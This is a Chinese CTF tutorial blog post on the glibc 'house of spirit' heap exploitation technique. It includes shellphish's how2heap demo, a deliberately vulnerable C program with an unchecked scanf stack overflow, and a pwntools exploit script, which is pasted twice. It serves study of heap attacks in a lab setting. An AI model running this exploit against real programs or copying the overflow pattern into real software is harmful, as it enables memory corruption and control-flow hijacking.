linux 堆溢出学习之house of spirit(2)

最新推荐文章于 2024-02-12 10:16:35 发布
最新推荐文章于 2024-02-12 10:16:35 发布
阅读量945 收藏
点赞数 1
分类专栏: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29343201/article/details/59593901
版权
ctf 同时被 2 个专栏收录
50 篇文章 2 订阅
订阅专栏
pwn
37 篇文章 3 订阅
订阅专栏

开篇

本篇接上篇的house of spirit技术的学习,上篇我们翻译了这个技术来源的文章,这篇我们将通过实例和总结来进行一个更深入的了解

house of spirit 简介

  • 攻击方式:结合栈溢出和堆溢出

  • 攻击效果:返回任意位置作为一个chunk

    攻击要求:

  • 可溢出控制某个malloc返回的地址

  • 被控制的地址被free
  • 再次malloc一个chunk
  • 可对第二次分配的chunk进行输入

house of spirit 解释

这种方法主要是通过利用构造一个fakechunk,然后控制一个free去达到溢出的效果。原文中的思路,是在栈上构造一个fakechunk,这样把函数指针或者栈上的函数返回值包起来,这样下次写入就可以更改掉这个返回值从而劫持控制流。

这里还需要注意一个fastbin的next size的正确性检验,也就是说fastbin的chunk的next chunk的size也必须是在fastbin的大小范围内,且和我当前这个chunk的大小一样,否则就会出错,所以原文的方法是:

  1. 控制返回地址前的栈上位置的内容,构造fakechunk头
  2. 控制返回地址后的栈上位置的内容,构造next chunk 的fake chunk 头
  3. 通过溢出,控制free的内容,使得free返回地址前的那个fake chunk
  4. 再次分配,使得返回地址前的fake chunk被分配
  5. 写入fake chunk,即可写返回地址

house of spirit 示例

shellphish/how2heap

#include <stdio.h>
#include <stdlib.h>

int main()
{
    printf("This file demonstrates the house of spirit attack.\n");

    printf("Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    printf("This region must contain two chunks. The first starts at %p and the second at %p.\n", &fake_chunks[1], &fake_chunks[7]);

    printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size

    printf("The chunk.size of the *next* fake region has be above 2*SIZE_SZ (16 on x64) but below av->system_mem (128kb by default for the main arena) to pass the nextsize integrity checks .\n");
    fake_chunks[9] = 0x2240; // nextsize

    printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    a = &fake_chunks[2];

    printf("Freeing the overwritten pointer.\n");
    free(a);

    printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    printf("malloc(0x30): %p\n", malloc(0x30));
}

shellphish的这个可以说是把基本的东西都已经囊括了,我在这里做一个简单的解释。

首先用malloc(1)进行了初始化,然后用一个fake_chunks数组来模拟两个fake_chunk,一个位于0下标的位置,一个位于8下标的位置,1下标是第一个chunk的size,9下标是第二个chunk的size。

因为第一个chunk的大小为64字节,64位系统环境下8字节一个数字,所以从0下标开始,到8下标之前刚好64个字节,那么下一个chunk就正好连在他的后面,所以第二个chunk从8下标位置开始是prev_size,9下标是size,next size的检查要检查下一个chunk的size是否合法,所以9下标size这个值必须是合法的size值,所以给他赋值为合法值。

然后free第一个chunk,通过了检测之后下一次分配相应大小的chunk就会把这个第一个chunk分配出来了。

一个简单的示例

exploitable.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void vuln() {
    char *inner = (char*) malloc(20);
    char input[50];
    printf("%p\n", input); // simulate a leak

    scanf("%s", input); // a stack overflow, and here a fake chunk can be constructed

    free(inner);

    char *another = (char*) malloc(60);
    printf("allocated = %p\n", another);

}
int main() {
    char a[20];
    scanf("%s", a);
    // This scanf is before vuln, which the address will be higher than the return-address,
    // use this to pass next-size integrity check
    vuln();
    return 0;
}

exp.py

#!/usr/bin/python2
'''
exploit
'''
from pwn import *

PROC = process("./test")
def construct_chunk_head(prev_chunk_size, chunk_size, chunk_forward):
    '''
    since fastbin chunk has no BK, set it to 0
    '''
    return p32(prev_chunk_size) + p32(chunk_size) + p32(chunk_forward) + p32(0x0)

def main():
    '''main'''
    global PROC
    cons = construct_chunk_head(0, 64, 0)
    cons += p32(0x40)
    PROC.sendline(cons)
    #pwnlib.gdb.attach(PROC, execute="b *0x0804855f\nb *0x8048509\nc")
    rec = PROC.recvline()[:-1]
    leak = int(rec, 16)
    log.info(hex(leak))
    a_ptr = leak + 86

    payload = construct_chunk_head(0, 64, 0)
    where = 50 - len(payload)
    payload = 'a' * (where) + payload + 'b' * 4
    payload += p32(leak + where + 8)
    log.info("freeing: " + hex(leak + where + 8))
    PROC.sendline(payload)
    log.info("get:" + PROC.recvline())


if __name__ == "__main__":
    main()#!/usr/bin/python2
'''
exploit
'''
from pwn import *

PROC = process("./test")
def construct_chunk_head(prev_chunk_size, chunk_size, chunk_forward):
    '''
    since fastbin chunk has no BK, set it to 0
    '''
    return p32(prev_chunk_size) + p32(chunk_size) + p32(chunk_forward) + p32(0x0)

def main():
    '''main'''
    global PROC
    cons = construct_chunk_head(0, 64, 0)
    cons += p32(0x40)
    PROC.sendline(cons)
    rec = PROC.recvline()[:-1]
    leak = int(rec, 16)
    log.info(hex(leak))
    a_ptr = leak + 86

    payload = construct_chunk_head(0, 64, 0)
    where = 50 - len(payload)
    payload = 'a' * (where) + payload + 'b' * 4
    payload += p32(leak + where + 8)
    log.info("freeing: " + hex(leak + where + 8))
    PROC.sendline(payload)
    log.info("get:" + PROC.recvline())


if __name__ == "__main__":
    main()

这个示例的原理和第一个类似,不过这里稍微真实一点,和原文提出这个方法的情况比较相似,即通过两个可以控制的值把需要改动的值包起来,一个在下面一个在上面,通过低于他的那个来构造fakechunk,高于他的那个来构造可以通过next size检测的输入就可以将低于目标值的fake chunk分配出来了,然后更改fake chunk里的值就可以更改到想写的目标值了。

Anciety
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux 溢出学习house of spirit(1) malloc maleficarum hos翻译
jmp esp
03-02 2244
综述house of spirit是一种常用的溢出技术,而在如今的malloc实现中依然没有对这种方法进行保护,所以在目前还是一种有效的溢出技术。下面我们先从这种方法的来源之本讲起,即2005 Malloc Maleficarumcsdn原文 The House of SpiritThe House of Spirit is primarily interesting because of th
溢出学习笔记(linux)
weixin_30436891的博客
07-07 269
本文主要是linux的数据结构及调试、溢出利用的一些基础知识 首先,linux的数据结构如下 /* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing access to necessary ...
Linux 二进制漏洞挖掘入门系列之(七)溢出: House of Spirit
个人笔记
07-08 1485
0x10 基础知识 关于 bin 的一些特点 malloc 返回值,指向 chunk 的 user data 每个 bin 采取 LIFO 策略,最近被释放的 chunk 优先被再次使用 关于 fastbin 的一些特点 案例 int main(void) { void *chunk1,*chunk2,*chunk3; chunk1=malloc(0x30); chunk2=malloc(0x30); chunk3=malloc(0x30); //进行释放
linux如何防止空间被覆盖,溢出学习笔记(linux)
weixin_33027875的博客
05-07 265
本文主要是linux的数据结构及调试、溢出利用的一些基础知识首先,linux的数据结构如下/*This struct declaration is misleading (but accurate and necessary).It declares a "view" into memory allowing access to necessaryfields at known off...
[pwn][利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 777
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
漏洞之house系列1
08-04
漏洞之House系列1》主要探讨了Linux系统中glibc库在内存管理中的安全漏洞,特别是关于House of SpiritHouse of Force两种攻击技术。这些技术涉及到内存分配机制的细节,如smallbin、fastbin、unsorted bin以及...
Windows平台下的溢出利用技术
02-26
开头我讨论了在旧版本Windows下利用溢出的技术,试着给读者提供一些关于unlink过程是怎样执行的、以及freelist[n]里面的flink/blink是如何被攻击者控制并提供简单的任意“4字节写”操作的实用的知识。本文的主要...
Linux下基本栈溢出攻击
01-30
基本的栈溢出攻击,是最早产生的一种缓冲区溢出攻击方法,它是所有其他缓冲区溢出攻击的基础。但是,由于这种攻击方法产生的时间比较长,故而GCC编译器、Linux操作系统提供了一些机制来阻止这种攻击方法对系统产生...
关于java内存溢出的几种情况
12-22
 java.lang.OutOfMemoryError: Java heap space:这种是java内存不够,一个原因是真不够,另一个原因是程序中有死循环;  如果是java内存不够的话,可以通过调整JVM下面的配置来解决:  <jvm>-Xms3062m ...
总结windows下溢出的三种利用方式.rar_win32 汇编_溢出_溢出
09-14
总结windows下溢出的三种利用方式,涉及的知识有汇编,c语言,win32编程。
pwn工具箱之house of spirit
jmp esp
07-03 916
house of spirit基本信息 利用种类:利用 利用种类:释放fake chunk 利用思路:通过构造fake chunk,然后使得fake chunk被free,在下一次malloc时返回fake chunk 利用难点 需要能够控制被free的内容,才能构造fake chunk 在free fake chunk的时候,libc会检查next size,也就是从当前位置开始算,加上一个c
溢出学习笔记
ccx_john的专栏
07-11 1531
0x00 概述 本文从程序实例出发,展示了XP SP1下的溢出+代码执行,XP SP3下的溢出+内存任意写,主要面向{已经掌握缓冲区溢出原理,希望进一步了解溢出原理的初学者}、{就是想找个溢出例子跑一遍的安全爱好者}以及{跑不通各种溢出书籍示例代码、非得跑通代码才看的进去书的搜索者} 本笔记参考自:http://net-ninja.net/article/2011/Sep/0
《0day安全:软件漏洞分析技术》学习笔记-第五章溢出利用
u012067492的博客
06-20 1067
快表的使用
漏洞学习笔记——溢出原理
谈成(C/C++)
04-14 3579
最近在学习溢出原理,但是查了网上和书上的一些讲解,总是感觉缺少一些关键点。所以理解起来总是有点晕,经过努力的调试分析后,总结了下面的更为详细的溢出原理。如果不准确的地方,希望大佬可以提醒一哈~ 1.的结构: struct _LIST_ENTRY{ DWORD Flink; DWORD Blink; } //空闲头结构 struct _HEAP_FREE_ENTRY{ union{ struct{ union{ struct { WORD Size;
溢出笔记1.11 SafeSEH
hustd10的博客
04-16 1046
在上节写示例的过程中,我把要用到的POP+POP+RET指令写在了自己的一个DLL中。POP+POP+RET指令是很常见的指令,一般函数的末尾都是这种形式,因此,系统DLL中应该是有该指令的,比如ntdll.dll中就有: 图73我们把上节示例中的地址改成这个地址试试,没有弹出MessageBox,说明Shellcode失效了,在调试器中看看: 图74提示说无法处理异常,说明改了地址后的
《0day安全》中的溢出利用调试
Lethe's Blog
06-26 859
0x01 的工作原理 实验环境: 推荐使用环境 备注 操作系统 Windows20000虚拟机 分配策略对操作系统非常敏感 编译器 Visual C++ 6.0 默认编译选项 编译选项 默认编译选项 VS2003/VS2005的GS选项将导致实验失败 build 版本 release VS2003/VS2005的GS选项将导致实验失败 调试器 Ollydbg 需要配置Make OllyDbg just-in-time debugger选项 调试代码如下: #inclu
溢出笔记1.9 认识SEH
hustd10的博客
04-16 4820
从本节开始,我们就要研究一些稍微高级点的话题了,如同在1.2节中看到的,Windows中为抵抗栈溢出做了很多保护性的检查工作,编译的程序默认开启了这些保护。如果我们不能绕过这些保护,那么我们的Shellcode也就是一个玩具而已,什么都做不了。我们从SEH(结构化异常处理)开始。这篇文章讲SEH简洁易懂:http://www.securitysift.com/windows-exploit-deve
how2heap 深入学习(2)
CoLin的pwn小屋
02-12 759
glibc 2.23源码分析系列之house_of_mind_fastbin + house of orange
从零开始学howtoheap:理解fastbins的块重叠的问题1
最新发布
weixin_44626085的博客
02-12 999
how2heap是由shellphish团队制作的利用教程,介绍了多种利用技术,后续系列实验我们就通过这个教程来学习
Linux内存管理深入分析.pdf
01-10
要掌握溢出漏洞利用,首先必须理解Linux的内存模型和ptmalloc2的工作原理。通过学习《Understanding glibc malloc》这样的文章,并结合其他参考资料,可以逐步揭开内存管理的神秘面纱,为理解和利用这些漏洞打下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值